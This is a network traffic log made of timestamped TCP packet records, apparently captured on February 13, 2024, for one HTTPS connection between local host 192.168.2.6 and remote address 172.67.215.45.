Feb 13, 2024 21:13:54.259253025 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.262306929 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.262362957 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.262430906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.262485981 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.262506008 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.262558937 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.262677908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.262718916 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.262737989 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.262751102 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.262762070 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.262789965 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.262856960 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.262914896 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.262931108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.262985945 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.263322115 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.263379097 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.264029980 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.264103889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.264146090 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.264202118 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.265069008 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.265120983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.265727997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.265815020 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.265820980 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.265832901 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.265862942 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.265897036 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.307383060 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.307475090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.375642061 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.375691891 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.375839949 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.375852108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.375983953 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.376393080 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.376452923 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.376756907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.376821995 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.376837015 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.376895905 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.377660036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.377715111 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.379966974 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.380022049 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.380048037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.380104065 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.380403996 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.380458117 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.380520105 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.380564928 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.381371021 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.381421089 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.381999016 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.382054090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.382117987 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.382169008 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.382977962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.383029938 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.383775949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.383847952 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.383857012 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.383903027 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.384562016 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.384614944 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.385312080 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.385366917 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.385462046 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.385513067 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.386212111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.386277914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.386948109 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.387017012 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.387034893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.387085915 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.388711929 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.388783932 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.388787985 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.388820887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.388844967 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.391072989 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.391093969 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.391135931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.391143084 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.391172886 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.392954111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.392977953 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.393011093 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.393030882 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.393039942 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.393064976 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.395373106 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.395399094 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.395452023 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.395457029 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.395478964 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.397030115 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.397043943 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.397061110 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.397098064 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.397123098 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.397130013 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.397144079 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.397207022 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.399501085 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.399523973 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.399583101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.399589062 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.401366949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.401387930 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.401437044 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.401443005 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.401467085 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.401488066 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.424767971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.424793959 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.424982071 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.424993992 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.425128937 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.492892981 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.492927074 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.492983103 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.492995977 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.493021011 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.493052006 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.494577885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.494594097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.494625092 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.494633913 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.494653940 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.494672060 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.497088909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.497104883 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.497139931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.497148037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.497168064 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.497200966 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.498966932 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.498982906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.499028921 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.499037027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.499072075 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.500570059 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.500586033 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.500633955 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.500641108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.500672102 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.503046989 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.503062010 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.503113031 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.503119946 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.503153086 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.505459070 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.505475044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.505559921 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.505568027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.505598068 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.507200956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.507216930 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.507266998 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.507273912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.507311106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.509759903 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.509784937 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.509835005 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.509841919 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.509875059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.511450052 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.511468887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.511518002 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.511526108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.511559963 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.514060020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.514076948 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.514120102 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.514127970 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.514159918 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.515599012 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.515619993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.515675068 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.515681982 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.515714884 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.518065929 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.518086910 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.518134117 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.518141031 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.518173933 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.519908905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.519925117 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.519973993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.519980907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.520011902 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.522316933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.522335052 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.522372961 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.522382021 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.522416115 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.524169922 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.524188042 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.524240017 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.524250984 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.524290085 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.526503086 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.526519060 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.526566982 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.526573896 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.526595116 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.526611090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.528892994 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.528909922 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.528990984 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.528997898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.529036999 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.530754089 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.530771017 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.530819893 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.530827045 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.530864954 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.533236027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.533252954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.533298016 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.533303976 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.533329010 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.533346891 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.534890890 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.534918070 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.534970045 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.534976959 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.535015106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.537292957 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.537308931 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.537359953 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.537368059 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.537403107 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.539030075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.539045095 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.539104939 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.539112091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.539148092 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.541593075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.541605949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.541652918 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.541660070 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.541701078 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.543329000 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.543344975 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.543387890 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.543395042 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.543417931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.543430090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.545814991 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.545830011 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.545880079 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.545888901 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.545902967 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.545928955 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.547485113 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.547498941 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.547553062 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.547559977 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.547612906 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.610047102 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.610074997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.610124111 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.610138893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.610156059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.610176086 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.611674070 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.611702919 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.611742973 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.611749887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.611773014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.611794949 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.613665104 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.613682985 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.613730907 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.613746881 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.613782883 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.615391970 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.615408897 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.615457058 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.615463018 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.615487099 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.615561962 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.617784023 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.617798090 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.617835045 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.617841959 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.617868900 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.617894888 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.620718002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.620733023 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.620771885 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.620778084 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.620817900 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.620831966 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.622030020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.622044086 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.622092962 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.622098923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.622108936 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.622142076 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.624527931 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.624551058 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.624593973 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.624599934 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.624629974 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.624650002 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.626208067 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.626224041 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.626286983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.626286983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.626295090 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.626482010 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.628768921 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.628783941 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.628840923 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.628848076 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.628864050 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.629031897 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.630505085 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.630527973 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.630603075 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.630603075 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.630610943 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.630738020 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.632867098 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.632889986 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.632998943 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.633007050 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.633357048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.634633064 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.634655952 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.634730101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.634730101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.634737968 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.634776115 CET	49701	443	192.168.2.6	172.67.215.45
